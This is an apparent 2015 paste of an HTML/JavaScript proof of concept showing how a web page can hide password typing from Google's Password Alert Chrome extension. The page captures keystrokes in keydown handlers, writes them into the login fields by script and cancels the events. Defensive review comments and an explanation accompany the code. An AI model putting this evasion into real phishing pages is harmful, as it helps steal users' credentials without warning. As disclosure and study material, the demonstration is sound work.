
Google Chrome Password Alert Extension Bypass

a guest
May 2nd, 2015
HTML 2.59 KB | None | 0 0
  1. <html>
  2. <head>
  3. <title>Google Chrome Password Alert Extension Test</title>
  4. <script type="text/javascript">
  5.  
// Key-up half of the demo: cancels the default action of every key-up event
// whose keyCode falls in the 32..126 range. Nothing is read or stored here;
// the characters themselves are captured in the keydown handler.
window.onkeyup = function (evt) {
    var code = evt.keyCode;
    var inRange = code >= 32 && code <= 126;

    if (!inRange) {
        return;
    }

    evt.preventDefault();
};
  11.  
// Key-down half of the demo, and the part that matters for defenders.
//
// For a key in the 32..126 keyCode range pressed without Ctrl/Alt, the handler
// works out a character itself, appends it to the focused login field by
// writing to .value, and then cancels the event's default action. The field
// is therefore filled by script rather than by the browser's own text input.
// A monitor that relies on the key events that normally follow keydown would
// see none of them (presumably how the extension named in this page's title
// observes typing; confirm against its source).
//
// Review takeaway: an in-page keystroke monitor shares its event stream with
// the page it is meant to police, so it cannot be the only anti-phishing
// control. A login page that cancels key events in this range and writes
// input values from script is itself a useful detection signal.
//
// NOTE(review): keyCode identifies a key, not a character, so the mapping
// below is only approximate (the page calls itself a crude proof of concept).
window.onkeydown = function (evt) {
    var code = evt.keyCode;
    // Characters produced by Shift + the top-row digit keys (keyCode 48..57).
    var shiftedDigits = {
        48: ")", 49: "!", 50: "@", 51: "#", 52: "$",
        53: "%", 54: "^", 55: "&", 56: "*", 57: "("
    };
    var typed = null;
    var targetId;

    // Leave keys outside the range, and Ctrl/Alt combinations, to the browser.
    if (!(code >= 32 && code <= 126) || evt.ctrlKey || evt.altKey) {
        return;
    }

    if (code >= 65 && code <= 90 && !evt.shiftKey) {
        // Letter key without Shift: lower-case letter.
        typed = String.fromCharCode(code).toLowerCase();
    } else if (code >= 48 && code <= 57 && evt.shiftKey) {
        // Shift + digit: symbol from the table above.
        typed = shiftedDigits.hasOwnProperty(code) ? shiftedDigits[code] : null;
    } else {
        // Everything else: the keyCode is used directly as a character code.
        typed = String.fromCharCode(code);
    }

    if (typed !== null) {
        targetId = evt.target.id;
        // Only the two login inputs are written to.
        if (targetId === "txtUsername" || targetId === "txtPassword") {
            document.getElementById(evt.target.id).value += typed;
        }
    }

    // Cancel the default action whether or not a field was updated.
    evt.preventDefault();
};
  44.  
// Form action for the demo: shows the captured username and password in an
// alert() dialog. Nothing is sent anywhere; the dialog only demonstrates that
// the page's own script holds both values.
function DoLogin() {
    var user = document.getElementById("txtUsername").value;
    var pass = document.getElementById("txtPassword").value;
    var report = "Username: " + user + "\nPassword: " + pass;

    alert(report);
}
  49.  
  50. </script>
  51. </head>
  52. <body>
  53.  
  54. <form method="post" action="javascript:DoLogin();">
  55.     <table>
  56.         <tbody>
  57.             <tr>
  58.                 <td><label for="txtUsername">Username</label></td>
  59.                 <td><label for="txtPassword">Password</label></td>
  60.             </tr>
  61.             <tr>
  62.                 <td><input type="text" id="txtUsername" /></td>
  63.                 <td><input type="password" id="txtPassword" /></td>
  64.             </tr>
  65.             <tr>
  66.                 <td colspan="2" style="text-align: center;">
  67.                     <input type="submit" value="Login" />
  68.                     <input type="reset" value="Clear" />
  69.                 </td>
  70.             </tr>
  71.         </tbody>
  72.     </table>
  73. </form>
  74.  
  75. <h1>Explanation</h1>
  76.  
  77. <p>This is a crude proof-of-concept that shows how the Google Password Alert extension for Google Chrome can be bypassed by a malicious website.</p>
  78.    
  79. <p>This method works by binding the keyup and keydown events for the window, determining which key is being pressed, and appending the value of the key being pressed to the username or password input if one of them has focus.</p>
  80.  
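  81. <p>Once the value has been added to the focused input, the keydown event's default action is canceled with e.preventDefault(), so the browser neither inserts the character itself nor fires the keypress event that would normally follow. With this method, the keystroke is handled before the Google Password Alert extension is able to see it; therefore, it cannot warn the user.</p>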
  82.  
  83. </body>
  84. </html>